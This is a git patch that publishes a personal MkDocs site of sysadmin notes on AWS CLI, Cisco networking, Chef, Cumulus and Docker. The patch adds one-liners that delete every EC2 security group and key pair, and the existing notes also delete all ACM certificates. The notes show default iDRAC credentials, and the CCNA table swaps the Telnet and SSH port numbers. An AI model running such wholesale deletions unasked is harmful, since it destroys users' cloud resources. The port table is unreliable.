From 1715e9b2ef3b7887a0ffccb72bad06f05668aa6c Mon Sep 17 00:00:00 2001 From: Laurent Dumont Date: Mon, 9 Dec 2024 12:08:27 -0500 Subject: [PATCH] Deployed 735d670 with MkDocs version: 1.6.0 --- aws-cli/index.html | 75 +++++++++++++++++++++++++++++++++++++++ search/search_index.json | 2 +- sitemap.xml.gz | Bin 127 -> 127 bytes 3 files changed, 76 insertions(+), 1 deletion(-) diff --git a/aws-cli/index.html b/aws-cli/index.html index 648bcfd..3a53ab8 100644 --- a/aws-cli/index.html +++ b/aws-cli/index.html @@ -363,6 +363,39 @@ + + +
  • + + + EC2 + + + + +
    • @@ -1250,6 +1283,39 @@ + + +
  • + + + EC2 + + + + +
    • @@ -1315,6 +1381,15 @@

    API Gateway

    aws apigatewayv2 delete-api --api-id 80wxwwwn2l
    +

    EC2

    +

    Delete Security Groups

    +
    aws ec2 describe-security-groups --query "SecurityGroups[*].GroupName" --no-cli-pager --output json | jq -r '.[]' | while IFS= read -r sg; do aws ec2 delete-security-group --group-name $sg; done 
+
    + +

    Delete key pairs

    +
    aws ec2 describe-key-pairs --query "KeyPairs[*].KeyName" --no-cli-pager | jq -r '.[]' | while IFS= read -r key; do aws ec2 delete-key-pair --key-name $key --no-cli-pager; done
+
    + diff --git a/search/search_index.json b/search/search_index.json index 3486fec..1535aac 100644 --- a/search/search_index.json +++ b/search/search_index.json @@ -1 +1 @@ -{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Home","text":""},{"location":"aws-cli/","title":"AWS","text":""},{"location":"aws-cli/#acm","title":"ACM","text":"

    Useful things - Use no-cli-pager to send the result directly to the terminal and not to less - There is a bug for the help menu --> https://github.com/aws/aws-cli/issues/4972 - You can send it to cat as a workaround --> aws ec2 help | cat - There is an autocomplete built into the CLI - You can use --cli-auto-prompt with each prompt

    "},{"location":"aws-cli/#list-certificates","title":"List certificates","text":"
    aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn'\n
    "},{"location":"aws-cli/#acm-delete-certificates","title":"ACM Delete certificates","text":"
    for arn in $(aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn' | jq -r '.[]'); do aws acm delete-certificate --certificate-arn \"$arn\"; done\n
    "},{"location":"aws-cli/#codecommit","title":"CodeCommit","text":"

    Note, this service is deprecated by AWS. You should stop current usage and migrate to SCM alternatives (Gitlab, Github and others)

    "},{"location":"aws-cli/#list-repositories","title":"List repositories","text":"
    aws codecommit list-repositories --no-cli-pager\n
    "},{"location":"aws-cli/#delete-repositories","title":"Delete repositories","text":"
    aws codecommit delete-repository --repository-name gremlins-api\n
    "},{"location":"aws-cli/#api-gateway","title":"API Gateway","text":"

    Note the apigatewayv2 in some cases

    Get a custom domain name

    aws apigateway get-domain-names --no-cli-pager --query 'items[*]['regionalCertificateArn','domainName']' | jq -r '.[]'\n

    Delete a custom domain name

    aws apigateway delete-domain-name --domain-name sig.coldnorthadmin.com\n

    Get an API

    aws apigatewayv2 get-apis --query 'Items[*]['ApiId']' --no-cli-pager\n

    Delete an API

    aws apigatewayv2 delete-api --api-id 80wxwwwn2l\n
    "},{"location":"bluetooth/","title":"Bluetooth","text":"

    Ubuntu reference https://wiki.ubuntu.com/DebuggingBluetooth#:~:text=On%20desktop%3A,%2Fvar%2Flog%2Fsyslog

    "},{"location":"bluetooth/#basic-bluetooth-troubleshooting-commands","title":"Basic bluetooth troubleshooting commands","text":"
    bluetoothctl --version\n
    hciconfig -a\n
    bluetoothctl\n[bluetooth]# show\n[bluetooth]# devices\n[bluetooth]# info <mac addr of any device you have problems with>\n
    rfkill list\nNecessary bluetooth log files in debug mode as per below\n
    "},{"location":"ccna/","title":"Cisco-CCNA","text":""},{"location":"ccna/#ethernet-and-frames","title":"Ethernet and Frames","text":""},{"location":"ccna/#ethernet-type-field","title":"Ethernet \"Type\" field","text":"

    Hub = port needs to be at half-duplex

    "},{"location":"ccna/#cisco-security","title":"Cisco Security","text":""},{"location":"ccna/#user-and-access-management","title":"User and access management","text":"

    Enable secret takes precedence over enable password.

    enable password potato\nenable secret potato2\n\nenable password = potato2\n

    Enable AAA (allow user with privilege 15 to login straight into enable mode)

    conf t\naaa new-model\naaa authentication login default group local\naaa authorization exec default group local\n

    Create user with default privilege 15 level

    conf t\nusername $USERNAME privilege 15 secret $PASSWORD\n

    login = password and username of the vty itself. login local = Local username database

    conf t\nline con 0\nlogin local\nexec-timeout 0 0\nlogging synchronous\n

    Line VTY user are set to privilege 15 automatically.

    conf t\nline vty 0 15\nprivilege level 15\n

    \"Encrypt\" passwords in the startup-config.

    service password-encryption\n
    "},{"location":"ccna/#port-security","title":"Port-Security","text":"

    Enabling port security on port Cannot be enabled on a trunk/dynamic/auto port. Must be an access port.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\n

    Keep MAC addresses when port-shutdown or switch reload.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\nswitchport port-security mac-address sticky\n
    "},{"location":"ccna/#mac-aging","title":"MAC aging","text":"

    Dynamic MAC aging default = 0 absolute timer = Counts down irregardless of traffic inactivity timer = resets when traffic is seen from MAC. maximum - Default 1 If you raise the number of max MAC addresses on a port, you can run static and dynamic MAC detection.

    "},{"location":"ccna/#mac-address-conversion","title":"MAC address conversion","text":"Character HEX a 10 b 11 c 12 d 13 e 14 f 15

    Hexadecimal A7 to decimal A = 10 units of 16 (A=16) ---> 160 7 = 7 units of 1 ---> 7 160 + 7 = 167

    Decimal 241 to Hexadecimal 1. f = 15 * 16 2. 1 = 1 * 1 3. F1

    "},{"location":"ccna/#violation-option","title":"Violation option","text":"

    protect - Drops traffic, no SYSLOG, no SNMP Trap, no counters increased restrict - Drops traffic, generate SNMP trap, generate SYSLOG. shutdown - Default, increase violation counters, Port shutdown in error-disabled.

    Show port-security commands

    show port-security interface fastethernet 0/1\n
    show port-security address\n

    Error disabled recovery Default recovery 300 seconds

    conf t\nerrordisable recovery cause ?\nerrordisable recovery cause psecure-violation\nerrdisable recovery interval 30\n
    show errdisable recovery\n
    "},{"location":"ccna/#vlan-interfaces-svi","title":"VLAN interfaces (SVI)","text":""},{"location":"ccna/#autonegociation-speed-and-duplex","title":"Autonegociation - Speed and Duplex","text":""},{"location":"ccna/#interface-range","title":"Interface range","text":"
    interface range fastethernet 0/1-24\ninterface range fastethernet 0/1-24,25,26\n
    "},{"location":"ccna/#tcp-and-udp","title":"TCP and UDP","text":""},{"location":"ccna/#tcp","title":"TCP","text":""},{"location":"ccna/#udp","title":"UDP","text":""},{"location":"ccna/#port-numbers","title":"Port Numbers","text":"

    Well-known port numbers:

    Protocol / Transport Port HTTPS / TCP 443 SNMP / UDP 161 SMTP / TCP 25 TELNET / TCP 22 SSH / TCP 23

    Socket ---> Combination of an ipaddress and a port number. 192.168.1.1:10000

    "},{"location":"ccna/#dhcp","title":"DHCP","text":"

    DORA 1. Discover - Broadcast from client. 2. Offer - DHCP server receives Discover and sends unicast offer to client. 3. Request - Client sends request for the offered IP address. 4. Ack - DHCP server ack the client request and assigns the IP.

    "},{"location":"ccna/#routing-static-routes","title":"Routing - Static Routes","text":"
    ip route destination_subnet destination_mask [local-router-exit-interface | next-hop-ip-address]\n\nip route 2.2.2.2 255.255.255.0 192.168.1.1\n\n#Default Route\nip route 0.0.0.0 0.0.0.0 [local-router-exit-interface | next-hop-ip-address]\n
    "},{"location":"ccna/#routing-distance-vector-protocols-rip","title":"Routing - Distance Vector Protocols - RIP","text":"

    RIPv1 / IGRP

    RIPv2

    Split Horizon

    Route Poisoning

    Hops

    "},{"location":"ccna/#enabling-ripv2","title":"Enabling RIPv2","text":"
    conf t\nrouter rip\n\n#Show protocols active on router\nshow ip protocols\n\n#Enable specific version of RIPv2 per interface or global.\ninterface gig0/1\nip rip send version 2\n\nconf t\nrouter rip\nrip version 2\nnetwork 10.10.10.0\nnetwork 10.10.11.0\n\n#Disable auto summary\nconf t\nrouter rip\nno auto-summary\n\n#Enable split Horizon\ninterface serial0/1/0\nip split-horizon\n

    Confirming that RIPV2 works.

    show ip protocols\nshow ip rip database\n

    Clear RIP routes.

    clear ip route *\n
    "},{"location":"ccna/#passive-interfaces","title":"Passive interfaces","text":"

    Prevents sending RIPv2 updates from interfaces where it's not necessary.

    conf t\nrouter rip\npassive-interface fastethernet0/1\npassive-interface fastethernet0/2\n
    conf t\nrouter rip\npassive-interface default\nno passive-interface fastethernet0/1\nno passive-interface fastethernet0/2\n
    "},{"location":"ccna/#rip-load-balancing","title":"RIP Load Balancing","text":"

    1) If a subnet is reachable through two paths with the same hope count --> Load balance across the two links.

    Disabling equal cost load balancing

    conf t\nrouter rip\nmaximum-path 1\n
    "},{"location":"ccna/#default-route-in-rip","title":"Default route in RIP","text":"
    conf t\nrouter rip\ndefault-information originate\n
    "},{"location":"ccna/#routing-administrative-distance","title":"Routing Administrative distance","text":"

    1) The prefix mask is considered first. The more specific route is installed. 2) If the prefix max is \"=\" ---> Administrative Distance is checked. The route with the lowest ADs wins.

    "},{"location":"ccna/#floating-static-routes","title":"Floating static routes","text":"

    If a route with a lower AD is removed from the routing table, the static route will be added and become active.

    conf t\nip route 2.2.2.0 255.255.255.0 21.1.1.2 [static route metric here | higher than routing protocol 1-255 ]\n
    "},{"location":"ccna/#subnetting","title":"Subnetting","text":"128 64 32 16 8 4 2 1 45 0 0 0 0 1 1 0 1

    200.17.100.3

    128 64 32 16 8 4 2 1 200 1 1 0 0 1 0 0 0 17 0 0 0 1 0 0 0 1 100 0 1 1 0 0 1 0 0 3 0 0 0 0 0 0 1 1

    11001000.00010001.01100100.00000011

    "},{"location":"ccna/#network-class","title":"Network class","text":"Class A Class B Class C 1st Octet range 1 - 126 128 - 191 192 - 223 Network Mask 255.0.0.0 - /8 255.255.0.0 - /16 255.255.255.0 - /24"},{"location":"ccna/#number-of-subnet-in-a-network-200110-27","title":"Number of subnet in a network - 200.1.1.0 /27","text":"
    1. Find the class of the subnet --> Class C (+192)
    2. A class C is a /24 by default.
    3. /27 - /24 = 3 subnet bits.
    4. Number of subnet --> 2^Number_subnet_bits_remaining --> 2^3 --> 2 * 2 * 2 = 8 subnets
    "},{"location":"ccna/#number-of-hosts-per-subnet-200110-27","title":"Number of hosts per subnet - 200.1.1.0 /27","text":"
    1. Find the number of host bits --> /32 - /27 --> /5 host bits
    2. Find the number of valid host per subnet - remove subnet and broadcast address.
    3. (2^(number of host bits))-2 --> 2^5 --> 2 * 2 * 2 * 2 * 2 --> 32 - 2 --> 30
    "},{"location":"ccna/#find-the-subnet-of-an-ip-address-101721418","title":"Find the Subnet of an IP address - 10.17.2.14/18","text":"
    1. /18 = First two octets = 16 bits + 2 bits from third octet
    2. 10.17.00000010
    3. 10.17.00 000000 --> Total of 18 bits for subnet address
    4. Subnet address = 10.17.0.0/18
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-210461100-25","title":"Find the broadcast and range of valid addresses in subnet - 210.46.110.0 /25","text":"
    1. /32 - /25 = last 7 bits --> host bits
    2. 01111111 --> 64 + 32 +16 +8 + 4 + 2 +1 --> 96 + 16 + 15 --> 96 + 31 --> Broadcast = 210.46.110.127
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-15010640-18","title":"Find the broadcast and range of valid addresses in subnet - 150.10.64.0 /18","text":"
    1. /32 - /18 = last 14 bits --> host bits
    128 64 32 16 8 4 2 1 64 0 1 0 0 0 0 0 0
    1. Broadcast --> 150.10.01111111.11111111 --> 150.10.127.255
    2. Range of valid addresses --> 150.10.64.1 to 150.10.127.254
    "},{"location":"ccna/#access-lists","title":"Access Lists","text":""},{"location":"ccna/#wildcard-masks","title":"Wildcard masks","text":""},{"location":"ccna/#standard-acl","title":"Standard ACL","text":" 
    <1-99>       Standard IP access-list number\n<1300-1999>  Standard IP access-list number (expanded range)\nWORD         Access-list name\n
    ip access-list standard 5 deny 3.3.3.0 0.0.0.255\ninterface fastethernet0\nip access-group 5 in\n
    "},{"location":"ccna/#extended-acl","title":"Extended ACL","text":""},{"location":"ccna/#named-extendedstandard-acl","title":"Named Extended/Standard ACL","text":" 
    conf t\nip access-list extended BLOCK11\ndeny ip 3.3.3.0 0.0.0.255 11.11.11.0 0.0.0.255\npermet ip any any\n
    "},{"location":"ccna/#acl-on-vty-lines","title":"ACL on VTY lines","text":"
    conf t\nline vty 0 14\naccess-class MGMT-NETWORKS in\n
    "},{"location":"ccna/#acl-sequence-numbers","title":"ACL Sequence numbers","text":" 
    conf t\nip access-list extended 101\nno $SEQUENCE_NUMVER\n
    "},{"location":"ccna/#where-to-apply-acls","title":"Where to apply ACLs","text":""},{"location":"ccna/#ntp-network-time-protocol","title":"NTP - Network Time Protocol","text":""},{"location":"ccna/#stratum-level-of-accuracy-of-the-ntp-server","title":"Stratum - Level of accuracy of the NTP server.","text":""},{"location":"ccna/#ntp-modes","title":"NTP Modes","text":" 
    !*** Set the device itself as the master NTP server.\nconf t\nntp master\n
    !*** Set the NTP server for the device.\nconf t\nntp server ntp.nist.ca\n
    conf t\nntp peer ntp.potato.com\n
    !*** Show all ntp services from which the device will sync it's clock. Also shows the preferred device.\nshow ntp associations\n\nshow ntp status\n\nshow clock\n
    !*** Under device interface configuration.\n!*** Sets broadcast server mode (send updates)\nconf t\ninterface serial 0/1/0\nntp broadcast\n\n\n!*** Set client broadcast mode\nconf t\ninterface serial 0/1/0\nntp broadcast client\n
    "},{"location":"ccna/#nat-pat-network-address-translation-port-address-translation","title":"NAT / PAT - Network Address Translation / Port Address Translation","text":""},{"location":"ccna/#static-nat","title":"Static NAT","text":" 
    !*** Place on the interfaces closest to the hosts.\nip nat inside\n\n!*** Place on the WAN interface.\nip nat outside\n\n!*** Setup Static NAT / One to one mapping\nip nat inside source static 10.1.1.2 200.1.1.1\n\n\n!*** Show translations\nshow ip nat translations\n\n!*** Show NAT statistics\nshow ip nat statistics\n\n!*** clear ip nat table to reset the NAT mappings\nclear ip nat translations *\n
    "},{"location":"ccna/#dynamic-nat","title":"Dynamic NAT","text":"

    Allow the NAT of a pool of internal address to a pool of outside addresses.

    !*** Create IP NAT Pool\nip nat pool CCNA 200.1.1.1 200.1.1.5 prefix-length 24\n\n!*** Create the access-list of internal host that will be NAT.\naccess-list 2 permit host 10.1.1.2\naccess-list 2 permit host 10.1.1.22\n\n!*** Create the NAT function for the access-list 2 and the pool CCNA  \nip nat inside source list 2 pool CCNA\n
    "},{"location":"ccna/#port-address-translation-nat-overload","title":"Port address translation - NAT Overload","text":"

    Allows the mapping of multiple inside addresses to a single outside address using a combination of the IP address / Port Number in ordre to uniquely identify each flow of data.

    !*** Overload of the inside addresses to the outside address\nip nat inside source list 2 interface serial0/1/0 overload\n
    "},{"location":"ccna/#ipv6","title":"IPv6","text":""},{"location":"ccna/#compressing-ipv6-addresses","title":"Compressing IPv6 addresses","text":""},{"location":"ccna/#assigning-ipv6-addresses-to-interfaces","title":"Assigning IPv6 addresses to interfaces","text":"
    !### Enable IPv6 Routing for the router.\nipv6 unicast-routing\n\n!### Assign an IPv6 address to an interface\ninterface fastethernet0/1\nipv6 address 2001:1111:2222:1::1/64\n
    "},{"location":"ccna/#types-of-ipv6-addresses","title":"Types of IPv6 addresses.","text":""},{"location":"ccna/#eui-64-process","title":"EUI-64 Process","text":"
    1. Take MAC address of the interface
    2. 11-22-33-aa-bb-cc
    3. Divide in half and insert FFFE.
    4. 11-22-33-FF-FE-AA-BB-CC
    5. 1122:33FF:FEAA:BBCC
    6. Do the bit inversion (invert the 7th bit of the address)
    7. 1122:33FF:FEAA:BBCC --> 1322:33FF:FEAA:BBCC
    "},{"location":"ccna/#use-eui-64-process-for-global-unicast-address","title":"Use EUI-64 process for global unicast address.","text":"
    ipv6 address 2001:1111:2222:1::/64 eui-64\n
    "},{"location":"ccna/#ipv6-ndp-neighbor-discovery-process","title":"IPv6 NDP - Neighbor Discovery Process","text":""},{"location":"ccna/#ndp-router-discovery","title":"NDP - Router Discovery","text":"
    1. Hosts multicast packet - Router Solicitation (RS) message - Destination address FF02::2 - All-IPv6-Routers address
    2. Routers receives RS on FF02::2 and sends RA (Router Advertisement).
    3. If the soliciting node HAS an IPv6 address --> RA is unicast to the host.
    4. If the soliciting node DOES NOT have an IPv6 address --> RA is sent to FF02::1 - \"All-IPV6-Nodes\"
    5. RA are also sent to FF02::1 every 200 seconds.
    6. FF02::1 --> All IPv6 hosts.
    "},{"location":"ccna/#ndp-host-discovery","title":"NDP - Host Discovery","text":""},{"location":"ccna/#dhcp-and-ipv6","title":"DHCP and IPv6","text":""},{"location":"ccna/#stateful-dhcp","title":"Stateful DHCP","text":"

    Stateful DHCP does not send \"Default Gateway\" in the DHCP lease. That part is discovered during the NDP process with NA and NS messages.

    "},{"location":"ccna/#stateless-dhcp","title":"Stateless DHCP","text":""},{"location":"ccna/#ipv6-duplicate-address-detection-dad","title":"IPv6 - Duplicate Address Detection - DAD","text":"

    Prevents duplicate addresses from being used on the network. 1. The host will send an NS (with the source address all :: - 128 zeros - unspecified ipv6 address) to the address it wants to use to FF02::1 (All IPV6 nodes) 2. If it gets a response, it means that a host is already using that address.

    "},{"location":"ccna/#ipv6-packet-header","title":"IPv6 Packet Header","text":""},{"location":"ccna/#logging-and-timestamps","title":"Logging and Timestamps","text":"

    Change the aspect and format of timestamps for SYSLOG and DEBUG message.

    service timestamps log datetime\n\n!### Add year to log timestamps.\nservice timestamps log datetime year\n\n!### Add millisecond to log timestamps.\nservice timestamps log datetime msec\n\nservice timestamps log datetime year msec show-timezone\n
    "},{"location":"ccna/#logging-to-remote-server","title":"Logging to remote server","text":"

    Enable logging to the console.

    logging console\n

    Enable buffered logging. Local buffer on the server.

    logging buffer\n

    Enable logging to a remote server.

    logging host $SYSLOG_SERVER_IPADDRESS\n

    Enable console logging on SSH/Telnet session

    conf t\nlogging monitor\nexit\nterminal monitor\n
    "},{"location":"ccna/#banner-configuration","title":"Banner configuration","text":"

    Three types of banners.

    "},{"location":"ccna/#cdp-cisco-discovery-protocol","title":"CDP - Cisco Discovery Protocol","text":" 
    show cdp neighbors\nshow cdp neighbors details\nshow cdp entry $REMOTE_DEVICE_HOSTNAME\n\n!*** Enable CDP globally.\ncdp run\nno cdp run\n\n!*** Enable CDP on an interface\ninterface fastethernet0/0\ncdp enable\nno cdp enable\n\n!*** Show CDP information\nshow cdp information\nshow cdp interface fastethernet 0/0\n
    "},{"location":"ccna/#lldp-link-layer-discovery-protocols","title":"LLDP - Link Layer Discovery Protocols","text":"

    You can disable the received and transmit of LLDP packets per interface. That is not possible for CDP.

    show lldp\n\nconf t\nlldp run\n\nshow lldp neighbor detail\n

    "},{"location":"ccna/#confreg-register-and-password-recovery","title":"Confreg Register and Password Recovery","text":" 
    show version | include register\nconfig-register 0x2142\n
    "},{"location":"chef/","title":"Chef","text":""},{"location":"chef/#chef-server-setup","title":"Chef server setup","text":"
    sudo dpkg -i /tmp/chef-server-core-<version>.deb\nchef-server-ctl reconfigure\nchef-server-ctl user-create USER_NAME FIRST_NAME LAST_NAME EMAIL 'PASSWORD' --filename FILE_NAME\nchef-server-ctl org-create northernsysadmin 'Northern Sysadmin Inc' --association_user sysadmin --filename /var/chef_ssh/northernsysadmin-validator.pem\n
    knife ssl check\nknife ssl fetch\n\nknife cookbook upload $COOKBOOK_NAME_HERE\nknife client list\nknife cookbook list\n
    knife bootstrap 10.255.255.8 --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1 --run-list 'recipe[learn_chef_apache2]'\n
    knife node list\nknife node show $NODE_NAME\n
    "},{"location":"chef/#create-roles-and-assign-cookbooks-to-them","title":"Create roles and assign cookbooks to them.","text":"

    roles/ntp.json

    {\n   \"name\": \"ntp\",\n   \"description\": \"NTP server role.\",\n   \"json_class\": \"Chef::Role\",\n   \"default_attributes\": {\n     \"chef_client\": {\n       \"interval\": 60,\n       \"splay\": 1\n     }\n   },\n   \"override_attributes\": {\n   },\n   \"chef_type\": \"role\",\n   \"run_list\": [\"recipe[chef-client::default]\",\n                \"recipe[chef-client::delete_validation]\",\n                \"recipe[ntpd::default]\"\n   ],\n   \"env_run_lists\": {\n   }\n}\n
    1. Upload the role to the Chef Server : knife role from file roles/web.json
    2. Check that the role is on the server : knife role list - knife role show ntp
    3. Find node name from knife node list - knife node run_list set puppet-minion1 \"role[ntp]\"
    4. Confirm that the role is applied to the Node : knife node show puppet-minion1 --run-list
    5. Run chef-client on the node.
    6. knife ssh 10.255.255.8 'role:web' 'sudo chef-client' --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1
    "},{"location":"chef/#dependencies-in-cookbooks","title":"Dependencies in cookbooks.","text":"

    metadata.rb - keyword \"depends\" - Used to list the other coobooks from which the cookbook depends to run properly.

    name 'prometheus_node'\nmaintainer 'Laurent Dumont'\nmaintainer_email 'ldumont@northernsysadmin.com'\nlicense 'All Rights Reserved'\ndescription 'Installs/Configures prometheus-node'\nlong_description 'Installs/Configures prometheus-node'\nversion '0.1.1'\ndepends 'tar'\nchef_version '>= 12.14' if respond_to?(:chef_version)\n
    "},{"location":"cisco/","title":"Cisco","text":""},{"location":"cisco/#general-troubleshooting","title":"General Troubleshooting","text":"

    IOS-XR

    show route vrf all 10.4.229.135/32\nshow route vrf all | inc 10.4.229. \nshow evpn evi vpn-id 11034\n
    #IPV4\nshow arp vrf $VRF_NAME  Te0/0/0/6.200\n\n#IPV6\nshow ipv6 neighbors vrf $VRF_NAME Te0/0/0/6.198\n
    show bgp vrf BMCE ipv6 unicast summary\nshow bgp vrf BMCE ipv4 unicast summary\n
    show bfd ipv6 session\nshow bfd ipv4 session\n
    show running-config  | utility egrep -C5 bfd\nshow isis neighbors\nshow bgp ipv4 all summary\n
    "},{"location":"cisco/#show-detailed-information-about-interface","title":"Show detailed information about interface","text":"
    show controllers TenGigE0/0/0/18\n
    "},{"location":"cisco/#show-control-plane-policing","title":"Show control plane policing","text":"
    show running-config control-plane\n

    !Check Policy-Map drops/number of packet matching the policy.

    show policy-map interface $PHYSICAL_INTERFACE service instance $SVC_INST_ID\n

    !Show l2vpn xconnect status (ASR 9k)

    show l2vpn service xconnect interface gigabitEthernet 0/1\n

    !Show l2vpn xconnect status with details (ASR 9k)

    show l2vpn xconnect neighbor 192.252.143.75 pw-id 702 detail\n

    !Show service-instance traffic details (not xconnect, just local service instance)

    show ethernet service instance id 205 int ten0/3/0 detail\n
    show mpls l2transport vc vcid 395 detail\n

    !ASR 9000 | IOS-XE

    show l2vpn service xconnect interface TenGigabitEthernet0/3/0\n
    show l2vpn xconnect group OPEN01 xc-name OPEN01-C220\n
    show l2vpn xconnect group PARA07 detail\n

    !BGP stuff | IOS-XE

    show bgp summary | inc NEIGHBOR_IP\n

    !BGP stuff | IOS-XR

    show ip bgp summary\nshow ip bgp neighbors\nshow ip bgp neighbors 1.1.1.1\n

    !Montrer les routes recu d'un neighbor en particulier

    conf t\nrouter bgp AS_NUMBER\n

    !Il faut activer le log des routes pour chacun des neighbors BGP concern\u00e9s

    neighbor 1.1.1.1 soft-reconfiguration inbound\nexit\nsh ip bgp neighbors 1.1.1.1 received-routes\nsh ip bgp neighbors 1.1.1.1 advertised-routes\n
    conf t\nrouter bgp AS_NUMBER\nneighbor 1.1.1.1 shutdown\n

    !Satellite 9k light levels

    show nV satellite status\ntelnet vrf **nVSatellite 10.0.100.1\n\n!GigabitEthernet112/0/0/17 ---> Satellite 112\ntelnet vrf **nVSatellite 10.0.112.1\n!Port 17 on ASR = Port 18 on Satellite\nsh satellite powerlevels port 18\n

    https://www.cisco.com/c/en/us/td/docs/routers/access/4400/troubleshooting/memorytroubleshooting/isr4000_mem.html https://www.cisco.com/c/en/us/support/docs/routers/4000-series-integrated-services-routers/210760-Monitor-CPU-Usage-On-ISR4300-Series.html

    show process cpu sorted | ex 0.0\n
    show platform hardware qfp active datapath utilization\n
    show platform software status control-processor\n
    show platform software status control-processor brief\n
    show processes cpu platform sorted\n
    show platform software status control-processor brief\n

    Show CPU and Memory like \"htop\" for Linux

    monitor platform software process rp active\n
    "},{"location":"cisco/#troubleshooting-cisco-isr-memory","title":"Troubleshooting Cisco ISR Memory.","text":"

    Show IOS processes memory usage.

    show processes memory\n

    Show platform CPU and Memory usage

    show platform resources\n

    Show IOS-XE Memory usage (not IOS)

    show platform software status control-processor brief\n
    "},{"location":"cisco/#cisco-barebones-iosxr-bgp-config","title":"Cisco barebones IOSXR BGP config","text":"
    router bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 remote-as 65505\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd fast-detect\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd multiplier 3\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd minimum-interval 100\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all in\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all out\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast as-override\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast soft-reconfiguration inbound always\n
    "},{"location":"cisco/#cisco-radius","title":"Cisco Radius","text":"
    conf t\naaa new-model\n\naaa group server radius DHMTL-RADIUS\n server-private 10.0.99.22 auth-port 1812 acct-port 1813 key $INSERT_KEY_HERE\n\naaa group server tacacs+ DHMTL-TACACS\n server-private 10.0.99.22 key $INSERT_KEY_HERE\n\naaa authentication login default group DHMTL-RADIUS local\naaa authorization exec default group DHMTL-RADIUS local\naaa accounting commands 15 default start-stop group DHMTL-TACACS\naaa accounting commands 3 default start-stop group DHMTL-TACACS\n
    "},{"location":"cisco/#activate-telnet-on-ios-xr","title":"Activate Telnet on IOS-XR","text":"
    telnet vrf management ipv4 server max-servers 10\ntelnet vrf $VRF_NAME ipv6 server max-servers $MAX_CONCURRENT_TELNET_CONNECTIONS\n
    "},{"location":"cumulus/","title":"Cumulus","text":""},{"location":"cumulus/#random-commands","title":"Random commands","text":"
    net add interface swp1 ip address 170.39.196.82/32\nnet add bgp autonomous-system 65000\nnet add bgp neighbor 170.39.196.81 remote-as 65000\nnet add bgp neighbor 170.39.196.81 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.85 remote-as 65000\nnet add bgp neighbor 170.39.196.85 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\nnet add bgp neighbor 170.39.196.84 remote-as 65000\nnet add bgp neighbor 170.39.196.84 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.89 remote-as 65000\nnet add bgp neighbor 170.39.196.89 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.89 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp ipv4 unicast neighbor 170.39.196.84 next-hop-self\nnet add bgp ipv4 unicast neighbor 170.39.196.87 next-hop-self\n\n\nnet add ospf network 170.39.196.80/28 area 0\nnet add ospf default-information originate\nnet add ospf redistribute connected\nnet commit\n
    "},{"location":"docker/","title":"Docker","text":""},{"location":"docker/#stop-all-docker-containers-matching-pattern","title":"Stop all Docker containers matching pattern","text":"
    sudo docker ps | awk '/swift_/ {print $NF}' | xargs -I {} sudo docker stop {}\n
    "},{"location":"docker/#enter-namespace-of-the-container","title":"Enter Namespace of the container","text":"
    sudo docker inspect -f '{{.State.Pid}}' 744d1fc3fdff\n57752\n\n# Enter the Network namespace.\nsudo nsenter -t 57752 --net bash     \n
    "},{"location":"docker/#docker-install-bash-script","title":"Docker install bash script.","text":"
    #Install docker\n#!/bin/bash\n\nsudo apt-get install \\\n     apt-transport-https \\\n     ca-certificates \\\n     curl \\\n     gnupg2 \\\n     software-properties-common\n\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\n\nsudo add-apt-repository \\\n   \"deb [arch=amd64] https://download.docker.com/linux/debian \\\n   $(lsb_release -cs) \\\n   stable\"\n\nsudo apt-get update && apt-get install docker-ce\n
    "},{"location":"docker/#idrac-docker-vnc-image","title":"IDRAC Docker VNC image","text":"

    https://github.com/DomiStyle/docker-idrac6

    docker run -d -p 5800:5800 -p 5900:5900 -e IDRAC_HOST=IP_HERE -e IDRAC_USER=root -e IDRAC_PASSWORD=calvin domistyle/idrac6\n
    "},{"location":"docker/#radarr-docker","title":"Radarr Docker","text":"
    docker volume create radarr-config\n\nsudo docker run \\\n  -d \\\n  --name=radarr \\\n  -e PUID=109 \\\n  -e PGID=113 \\\n  -e TZ=America/Toronto \\\n  -p 7878:7878 \\\n  -v radarr-config:/config \\\n  -v /storage/media-gluster/movies/:/movies \\\n  -v /storage/media-gluster/downloads:/downloads \\\n  --restart unless-stopped \\\n  linuxserver/radarr\n
    "},{"location":"docker/#grafana-docker","title":"Grafana Docker","text":"
    sudo docker volume create grafana-storage\ndocker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  grafana/grafana\n
    "},{"location":"docker/#couchpotato-docker","title":"Couchpotato Docker.","text":"
